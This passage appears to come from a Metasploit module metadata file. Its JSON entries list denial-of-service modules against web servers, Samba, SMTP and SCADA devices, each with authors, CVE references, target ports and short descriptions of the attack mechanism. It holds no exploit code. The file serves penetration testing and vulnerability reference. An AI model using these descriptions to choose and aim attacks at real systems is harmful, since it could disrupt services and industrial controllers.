"Matthew Kienow <matthew_kienow[AT]rapid7.com>"
],
"description": "Slowloris tries to keep many connections to the target web server open and hold them open as long as possible.\n It accomplishes this by opening connections to the target web server and sending a partial request.\n Periodically, it will send subsequent HTTP headers, adding to, but never completing, the request.\n Affected servers will keep these connections open, filling their maximum concurrent connection pool,\n eventually denying additional connection attempts from clients.",
"references": [
"CVE-2007-6750",
"CVE-2010-2227",
"EDB-8976",
"URL-https://github.com/gkbrk/slowloris"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-28 13:49:31 +0000",
"path": "/modules/auxiliary/dos/http/slowloris.py",
"is_install_path": true,
"ref_name": "dos/http/slowloris",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/sonicwall_ssl_format": {
"name": "SonicWALL SSL-VPN Format String Vulnerability",
"full_name": "auxiliary/dos/http/sonicwall_ssl_format",
"rank": 300,
"disclosure_date": "2009-05-29",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "There is a format string vulnerability within the SonicWALL\n SSL-VPN Appliance - 200, 2000 and 4000 series. Arbitrary memory\n can be read or written to, depending on the format string used.\n There appears to be a length limit of 127 characters of format\n string data. With physical access to the device and debugging,\n this module may be able to be used to execute arbitrary code remotely.",
"references": [
"BID-35145",
"OSVDB-54881",
"URL-http://www.aushack.com/200905-sonicwall.txt"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/dos/http/sonicwall_ssl_format.rb",
"is_install_path": true,
"ref_name": "dos/http/sonicwall_ssl_format",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/ua_parser_js_redos": {
"name": "ua-parser-js npm module ReDoS",
"full_name": "auxiliary/dos/http/ua_parser_js_redos",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ryan Knell, Sonatype Security Research",
"Nick Starke, Sonatype Security Research"
],
"description": "This module exploits a Regular Expression Denial of Service vulnerability\n in the npm module \"ua-parser-js\". Server-side applications that use\n \"ua-parser-js\" for parsing the browser user-agent string will be vulnerable\n if they call the \"getOS\" or \"getResult\" functions. This vulnerability was\n fixed as of version 0.7.16.",
"references": [
"CVE-2017-16086",
"URL-https://github.com/faisalman/ua-parser-js/commit/25e143ee7caba78c6405a57d1d06b19c1e8e2f79",
"CWE-400"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/dos/http/ua_parser_js_redos.rb",
"is_install_path": true,
"ref_name": "dos/http/ua_parser_js_redos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/webkitplus": {
"name": "WebKitGTK+ WebKitFaviconDatabase DoS",
"full_name": "auxiliary/dos/http/webkitplus",
"rank": 300,
"disclosure_date": "2018-06-03",
"type": "auxiliary",
"author": [
"Dhiraj Mishra",
"Hardik Mehta",
"Zubin Devnani",
"Manuel Caballero"
],
"description": "This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.\n If successful, it could lead to application crash, resulting in denial of service.",
"references": [
"EDB-44842",
"CVE-2018-11646",
"URL-https://bugs.webkit.org/show_bug.cgi?id=186164",
"URL-https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-06-14 11:25:00 +0000",
"path": "/modules/auxiliary/dos/http/webkitplus.rb",
"is_install_path": true,
"ref_name": "dos/http/webkitplus",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/webrick_regex": {
"name": "Ruby WEBrick::HTTP::DefaultFileHandler DoS",
"full_name": "auxiliary/dos/http/webrick_regex",
"rank": 300,
"disclosure_date": "2008-08-08",
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "The WEBrick::HTTP::DefaultFileHandler in WEBrick in\n Ruby 1.8.5 and earlier, 1.8.6 to 1.8.6-p286, 1.8.7\n to 1.8.7-p71, and 1.9 to r18423 allows for a DoS\n (CPU consumption) via a crafted HTTP request.",
"references": [
"BID-30644",
"CVE-2008-3656",
"OSVDB-47471",
"URL-http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/webrick_regex.rb",
"is_install_path": true,
"ref_name": "dos/http/webrick_regex",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/wordpress_directory_traversal_dos": {
"name": "WordPress Traversal Directory DoS",
"full_name": "auxiliary/dos/http/wordpress_directory_traversal_dos",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Yorick Koster",
"CryptisStudents"
],
"description": "Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin\n function in wp-admin/includes/ajax-actions.php in WordPress before 4.6\n allows remote attackers to hijack the authentication of subscribers\n for /dev/random read operations by leveraging a late call to\n the check_ajax_referer function, a related issue to CVE-2016-6896.",
"references": [
"CVE-2016-6897",
"EDB-40288",
"OVEID-OVE-20160712-0036"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/wordpress_directory_traversal_dos",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/wordpress_long_password_dos": {
"name": "WordPress Long Password DoS",
"full_name": "auxiliary/dos/http/wordpress_long_password_dos",
"rank": 300,
"disclosure_date": "2014-11-20",
"type": "auxiliary",
"author": [
"Javier Nieto Arevalo",
"Andres Rojas Guerrero",
"rastating"
],
"description": "WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x\n before 4.0.1 allows remote attackers to cause a denial of service\n (CPU consumption) via a long password that is improperly handled\n during hashing.",
"references": [
"CVE-2014-9016",
"URL-http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034",
"OSVDB-114857",
"WPVDB-7681"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/auxiliary/dos/http/wordpress_long_password_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/wordpress_long_password_dos",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/wordpress_xmlrpc_dos": {
"name": "Wordpress XMLRPC DoS",
"full_name": "auxiliary/dos/http/wordpress_xmlrpc_dos",
"rank": 300,
"disclosure_date": "2014-08-06",
"type": "auxiliary",
"author": [
"Nir Goldshlager",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "Wordpress XMLRPC parsing is vulnerable to a XML based denial of service.\n This vulnerability affects Wordpress 3.5 - 3.9.2 (3.8.4 and 3.7.4 are\n also patched).",
"references": [
"CVE-2014-5266",
"URL-http://wordpress.org/news/2014/08/wordpress-3-9-2/",
"URL-http://www.breaksec.com/?p=6362",
"URL-http://mashable.com/2014/08/06/wordpress-xml-blowup-dos/",
"URL-https://core.trac.wordpress.org/changeset/29404",
"WPVDB-7526"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/wordpress_xmlrpc_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/ws_dos": {
"name": "ws - Denial of Service",
"full_name": "auxiliary/dos/http/ws_dos",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ryan Knell, Sonatype Security Research",
"Nick Starke, Sonatype Security Research"
],
"description": "This module exploits a Denial of Service vulnerability in npm module \"ws\".\n By sending a specially crafted value of the Sec-WebSocket-Extensions header on the initial WebSocket upgrade request, the ws component will crash.",
"references": [
"URL-https://nodesecurity.io/advisories/550",
"CWE-400"
],
"platform": "",
"arch": "",
"rport": 3000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-12-11 11:49:31 +0000",
"path": "/modules/auxiliary/dos/http/ws_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/ws_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/mdns/avahi_portzero": {
"name": "Avahi Source Port 0 DoS",
"full_name": "auxiliary/dos/mdns/avahi_portzero",
"rank": 300,
"disclosure_date": "2008-11-14",
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Avahi-daemon versions prior to 0.6.24 can be DoS'd\n with an mDNS packet with a source port of 0.",
"references": [
"CVE-2008-5081",
"OSVDB-50929"
],
"platform": "",
"arch": "",
"rport": 5353,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/mdns/avahi_portzero.rb",
"is_install_path": true,
"ref_name": "dos/mdns/avahi_portzero",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/misc/dopewars": {
"name": "Dopewars Denial of Service",
"full_name": "auxiliary/dos/misc/dopewars",
"rank": 300,
"disclosure_date": "2009-10-05",
"type": "auxiliary",
"author": [
"Doug Prostko <dougtko@gmail.com>"
],
"description": "The jet command in Dopewars 1.5.12 is vulnerable to a segmentation fault due to\n a lack of input validation.",
"references": [
"CVE-2009-3591",
"OSVDB-58884",
"BID-36606"
],
"platform": "",
"arch": "",
"rport": 7902,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/dos/misc/dopewars.rb",
"is_install_path": true,
"ref_name": "dos/misc/dopewars",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/misc/ibm_sametime_webplayer_dos": {
"name": "IBM Lotus Sametime WebPlayer DoS",
"full_name": "auxiliary/dos/misc/ibm_sametime_webplayer_dos",
"rank": 300,
"disclosure_date": "2013-11-07",
"type": "auxiliary",
"author": [
"Chris John Riley",
"kicks4kittens"
],
"description": "This module exploits a known flaw in the IBM Lotus Sametime WebPlayer\n version 8.5.2.1392 (and prior) to cause a denial of service condition\n against specific users. For this module to function the target user\n must be actively logged into the IBM Lotus Sametime server and have\n the Sametime Audio Visual browser plug-in (WebPlayer) loaded as a\n browser extension. The user should have the WebPlayer plug-in active\n (i.e. be in a Sametime Audio/Video meeting) for this DoS to work correctly.",
"references": [
"CVE-2013-3986",
"OSVDB-99552",
"BID-63611",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21654041",
"URL-http://xforce.iss.net/xforce/xfdb/84969"
],
"platform": "",
"arch": "",
"rport": 5060,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb",
"is_install_path": true,
"ref_name": "dos/misc/ibm_sametime_webplayer_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/misc/ibm_tsm_dos": {
"name": "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service",
"full_name": "auxiliary/dos/misc/ibm_tsm_dos",
"rank": 300,
"disclosure_date": "2015-12-15",
"type": "auxiliary",
"author": [
"Gianni Gnesa",
"William Webb <william_webb@rapid7.com>"
],
"description": "This module exploits a denial of service condition present in IBM Tivoli Storage Manager\n FastBack Server when dealing with packets triggering the opcode 0x534 handler.",
"references": [
"EDB-38979",
"OSVDB-132307"
],
"platform": "",
"arch": "",
"rport": 11460,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/misc/ibm_tsm_dos.rb",
"is_install_path": true,
"ref_name": "dos/misc/ibm_tsm_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/misc/memcached": {
"name": "Memcached Remote Denial of Service",
"full_name": "auxiliary/dos/misc/memcached",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Gregory Man <man.gregory@gmail.com>"
],
"description": "This module sends a specially-crafted packet to cause a\n segmentation fault in memcached v1.4.15 or earlier versions.",
"references": [
"URL-https://code.google.com/p/memcached/issues/detail?id=192",
"CVE-2011-4971",
"OSVDB-92867"
],
"platform": "",
"arch": "",
"rport": 11211,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/misc/memcached.rb",
"is_install_path": true,
"ref_name": "dos/misc/memcached",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/ntp/ntpd_reserved_dos": {
"name": "NTP.org ntpd Reserved Mode Denial of Service",
"full_name": "auxiliary/dos/ntp/ntpd_reserved_dos",
"rank": 300,
"disclosure_date": "2009-10-04",
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This module exploits a denial of service vulnerability\n within the NTP (network time protocol) daemon. By sending\n a single packet to a vulnerable ntpd server (Victim A),\n spoofed from the IP address of another vulnerable ntpd server\n (Victim B), both victims will enter an infinite response loop.\n Note, unless you control the spoofed source host or the real\n remote host(s), you will not be able to halt the DoS condition\n once begun!",
"references": [
"BID-37255",
"CVE-2009-3563",
"OSVDB-60847",
"URL-https://support.ntp.org/bugs/show_bug.cgi?id=1331"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb",
"is_install_path": true,
"ref_name": "dos/ntp/ntpd_reserved_dos",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/pptp/ms02_063_pptp_dos": {
"name": "MS02-063 PPTP Malformed Control Data Kernel Denial of Service",
"full_name": "auxiliary/dos/pptp/ms02_063_pptp_dos",
"rank": 300,
"disclosure_date": "2002-09-26",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a kernel-based overflow when sending abnormal PPTP Control Data\n packets to Microsoft Windows 2000 SP0-3 and XP SP0-1 based PPTP RAS servers\n (Remote Access Services). Kernel memory is overwritten resulting in a BSOD.\n Code execution may be possible however this module is only a DoS.",
"references": [
"BID-5807",
"CVE-2002-1214",
"OSVDB-13422",
"MSB-MS02-063"
],
"platform": "",
"arch": "",
"rport": 1723,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb",
"is_install_path": true,
"ref_name": "dos/pptp/ms02_063_pptp_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/rpc/rpcbomb": {
"name": "RPC DoS targeting *nix rpcbind/libtirpc",
"full_name": "auxiliary/dos/rpc/rpcbomb",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"guidovranken",
"Pearce Barry <pearce_barry@rapid7.com>"
],
"description": "This module exploits a vulnerability in certain versions of\n rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger\n large (and never freed) memory allocations for XDR strings on\n the target.",
"references": [
"CVE-2017-8779",
"BID-98325",
"URL-http://openwall.com/lists/oss-security/2017/05/03/12"
],
"platform": "",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/rpc/rpcbomb.rb",
"is_install_path": true,
"ref_name": "dos/rpc/rpcbomb",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/samba/lsa_addprivs_heap": {
"name": "Samba lsa_io_privilege_set Heap Overflow",
"full_name": "auxiliary/dos/samba/lsa_addprivs_heap",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module triggers a heap overflow in the LSA RPC service\n of the Samba daemon.",
"references": [
"CVE-2007-2446",
"OSVDB-34699"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb",
"is_install_path": true,
"ref_name": "dos/samba/lsa_addprivs_heap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/samba/lsa_transnames_heap": {
"name": "Samba lsa_io_trans_names Heap Overflow",
"full_name": "auxiliary/dos/samba/lsa_transnames_heap",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module triggers a heap overflow in the LSA RPC service\n of the Samba daemon.",
"references": [
"CVE-2007-2446",
"OSVDB-34699"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/samba/lsa_transnames_heap.rb",
"is_install_path": true,
"ref_name": "dos/samba/lsa_transnames_heap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/samba/read_nttrans_ea_list": {
"name": "Samba read_nttrans_ea_list Integer Overflow",
"full_name": "auxiliary/dos/samba/read_nttrans_ea_list",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jeremy Allison",
"dz_lnly"
],
"description": "Integer overflow in the read_nttrans_ea_list function in nttrans.c in\n smbd in Samba 3.x before 3.5.22, 3.6.x before 3.6.17, and 4.x before\n 4.0.8 allows remote attackers to cause a denial of service (memory\n consumption) via a malformed packet. Important Note: in order to work,\n the \"ea support\" option on the target share must be enabled.",
"references": [
"OSVDB-95969",
"BID-61597",
"EDB-27778",
"CVE-2013-4124"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb",
"is_install_path": true,
"ref_name": "dos/samba/read_nttrans_ea_list",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/sap/sap_soap_rfc_eps_delete_file": {
"name": "SAP SOAP EPS_DELETE_FILE File Deletion",
"full_name": "auxiliary/dos/sap/sap_soap_rfc_eps_delete_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Alexey Sintsov",
"nmonkee"
],
"description": "This module abuses the SAP NetWeaver EPS_DELETE_FILE function, on the SAP SOAP\n RFC Service, to delete arbitrary files on the remote file system. The module can\n also be used to capture SMB hashes by using a fake SMB share as DIRNAME.",
"references": [
"OSVDB-74780",
"URL-http://dsecrg.com/pages/vul/show.php?id=331",
"URL-https://service.sap.com/sap/support/notes/1554030"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb",
"is_install_path": true,
"ref_name": "dos/sap/sap_soap_rfc_eps_delete_file",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_dos/scada/allen_bradley_pccc": {
"name": "DoS Exploitation of Allen-Bradley's Legacy Protocol (PCCC)",
"full_name": "auxiliary/dos/scada/allen_bradley_pccc",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"José Diogo Monteiro <jdlopes@student.dei.uc.pt>",
"Luis Rosa <lmrosa@dei.uc.pt>",
"Miguel Borges de Freitas <miguelbf@dei.uc.pt>"
],
"description": "A remote, unauthenticated attacker could send a single, specially crafted\n Programmable Controller Communication Commands (PCCC) packet to the controller\n that could potentially cause the controller to enter a DoS condition.\n MicroLogix 1100 controllers are affected: 1763-L16BWA, 1763-L16AWA, 1763-L16BBB, and\n 1763-L16DWD.\n CVE-2017-7924 has been assigned to this vulnerability.\n A CVSS v3 base score of 7.5 has been assigned.",
"references": [
"CVE-2017-7924",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-17-138-03",
"URL-http://dl.acm.org/citation.cfm?doid=3174776.3174780"
],
"platform": "",
"arch": "",
"rport": 44818,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-01-22 13:33:24 +0000",
"path": "/modules/auxiliary/dos/scada/allen_bradley_pccc.rb",
"is_install_path": true,
"ref_name": "dos/scada/allen_bradley_pccc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/scada/beckhoff_twincat": {
"name": "Beckhoff TwinCAT SCADA PLC 2.11.0.2004 DoS",
"full_name": "auxiliary/dos/scada/beckhoff_twincat",
"rank": 300,
"disclosure_date": "2011-09-13",
"type": "auxiliary",
"author": [
"Luigi Auriemma",
"jfa"
],
"description": "The Beckhoff TwinCAT version <= 2.11.0.2004 can be brought down by sending\n a crafted UDP packet to port 48899 (TCATSysSrv.exe).",
"references": [
"CVE-2011-3486",
"OSVDB-75495",
"URL-http://aluigi.altervista.org/adv/twincat_1-adv.txt"
],
"platform": "",
"arch": "",
"rport": 48899,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/scada/beckhoff_twincat.rb",
"is_install_path": true,
"ref_name": "dos/scada/beckhoff_twincat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/scada/d20_tftp_overflow": {
"name": "General Electric D20ME TFTP Server Buffer Overflow DoS",
"full_name": "auxiliary/dos/scada/d20_tftp_overflow",
"rank": 300,
"disclosure_date": "2012-01-19",
"type": "auxiliary",
"author": [
"K. Reid Wightman <wightman@digitalbond.com>",
"todb <todb@metasploit.com>"
],
"description": "By sending a malformed TFTP request to the GE D20ME, it is possible to crash the\n device.\n\n This module is based on the original 'd20ftpbo.rb' Basecamp module from\n DigitalBond.",
"references": [
"URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/scada/d20_tftp_overflow.rb",
"is_install_path": true,
"ref_name": "dos/scada/d20_tftp_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/scada/igss9_dataserver": {
"name": "7-Technologies IGSS 9 IGSSdataServer.exe DoS",
"full_name": "auxiliary/dos/scada/igss9_dataserver",
"rank": 300,
"disclosure_date": "2011-12-20",
"type": "auxiliary",
"author": [
"jfa"
],
"description": "The 7-Technologies SCADA IGSS Data Server (IGSSdataServer.exe) <= 9.0.0.10306 can be\n brought down by sending a crafted TCP packet to port 12401. This should also work\n for version <= 9.0.0.1120, but that version hasn't been tested.",
"references": [
"CVE-2011-4050",
"OSVDB-77976",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-335-01.pdf"
],
"platform": "",
"arch": "",
"rport": 12401,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/scada/igss9_dataserver.rb",
"is_install_path": true,
"ref_name": "dos/scada/igss9_dataserver",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/scada/siemens_siprotec4": {
"name": "Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service",
"full_name": "auxiliary/dos/scada/siemens_siprotec4",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"M. Can Kurnaz"
],
"description": "This module sends a specially crafted packet to port 50000/UDP\n causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices.\n A manual reboot is required to return the device to service.\n CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.",
"references": [
"EDB-44103",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01"
],
"platform": "",
"arch": "",
"rport": 50000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-28 13:12:43 +0000",
"path": "/modules/auxiliary/dos/scada/siemens_siprotec4.rb",
"is_install_path": true,
"ref_name": "dos/scada/siemens_siprotec4",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/scada/yokogawa_logsvr": {
"name": "Yokogawa CENTUM CS 3000 BKCLogSvr.exe Heap Buffer Overflow",
"full_name": "auxiliary/dos/scada/yokogawa_logsvr",
"rank": 300,
"disclosure_date": "2014-03-10",
"type": "auxiliary",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>",
"Redsadic <julian.vilas@gmail.com>"
],
"description": "This module abuses a buffer overflow vulnerability to trigger a Denial of Service\n of the BKCLogSvr component in the Yokogawa CENTUM CS 3000 product. The vulnerability\n exists in the handling of malformed log packets, with an unexpected long level field.\n The root cause of the vulnerability is a combination of usage of uninitialized memory\n from the stack and a dangerous string copy. This module has been tested successfully\n on Yokogawa CENTUM CS 3000 R3.08.50.",
"references": [
"URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf",
"URL-https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
"CVE-2014-0781"
],
"platform": "",
"arch": "",
"rport": 52302,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/scada/yokogawa_logsvr.rb",
"is_install_path": true,
"ref_name": "dos/scada/yokogawa_logsvr",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/smb/smb_loris": {
"name": "SMBLoris NBSS Denial of Service",
"full_name": "auxiliary/dos/smb/smb_loris",
"rank": 300,
"disclosure_date": "2017-06-29",
"type": "auxiliary",
"author": [
"thelightcosine",
"Adam Cammack <adam_cammack@rapid7.com>"
],
"description": "The SMBLoris attack consumes large chunks of memory in the target by sending\n SMB requests with the NetBios Session Service(NBSS) Length Header value set\n to the maximum possible value. By keeping these connections open and initiating\n large numbers of these sessions, the memory does not get freed, and the server\n grinds to a halt. This vulnerability was originally disclosed by Sean Dillon\n and Zach Harding.\n\n DISCLAIMER: This module opens a lot of simultaneous connections. Please check\n your system's ULIMIT to make sure it can handle it. This module will also run\n continuously until stopped.",
"references": [
"URL-http://smbloris.com/"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-03-23 14:55:18 +0000",
"path": "/modules/auxiliary/dos/smb/smb_loris.rb",
"is_install_path": true,
"ref_name": "dos/smb/smb_loris",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/smtp/sendmail_prescan": {
"name": "Sendmail SMTP Address prescan Memory Corruption",
"full_name": "auxiliary/dos/smtp/sendmail_prescan",
"rank": 300,
"disclosure_date": "2003-09-17",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This is a proof of concept denial of service module for Sendmail versions\n 8.12.8 and earlier. The vulnerability is within the prescan() method when\n parsing SMTP headers. Due to the prescan function, only 0x5c and 0x00\n bytes can be used, limiting the likelihood for arbitrary code execution.",
"references": [
"OSVDB-2577",
"CVE-2003-0694",
"BID-8641",
"EDB-24"
],
"platform": "",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/dos/smtp/sendmail_prescan.rb",
"is_install_path": true,
"ref_name": "dos/smtp/sendmail_prescan",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/solaris/lpd/cascade_delete": {
"name": "Solaris LPD Arbitrary File Delete",
